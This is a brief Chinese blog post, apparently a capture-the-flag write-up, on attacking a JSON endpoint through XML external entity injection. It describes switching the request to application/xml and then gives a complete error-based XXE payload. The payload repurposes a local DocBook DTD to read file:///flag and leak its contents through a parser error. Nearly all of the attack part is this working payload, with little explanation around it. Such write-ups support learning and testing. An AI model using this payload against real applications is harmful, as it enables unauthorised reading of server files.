抓包发现传参json格式的数据,可以尝试xxe
先把content-type改为application/xml,再把json格式的数据改为xml格式的数据
最终poc:
<?xml version="1.0"?> <!DOCTYPE message[ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///aaaaa/%file;'>"> %eval; %error; '> %local_dtd; ]>
原创文章,作者:Carrie001128,如若转载,请注明出处:https://blog.ytso.com/277105.html